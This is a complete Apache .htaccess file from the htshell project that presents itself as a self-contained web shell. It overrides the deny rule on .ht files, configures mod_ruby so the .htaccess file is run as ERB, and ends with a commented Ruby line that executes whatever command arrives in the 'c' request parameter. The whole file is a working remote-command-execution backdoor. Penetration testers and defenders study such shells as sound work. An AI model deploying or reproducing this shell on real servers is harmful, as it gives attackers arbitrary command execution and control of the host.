# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as erb ruby file. This occur after
# apache has interpreted the apache directives from the .htaccess file
<IfModule mod_ruby.c>
RubyRequire apache/erb-run
RubySafeLevel 0
AddType text/html .htaccess
<Files *.htaccess>
SetHandler ruby-object
RubyHandler Apache::ERbRun.instance
</Files>
</IfModule>
# <% require 'cgi';cgi = CGI.new;cmd=cgi["c"];cmd.untaint;puts `#{cmd}` %>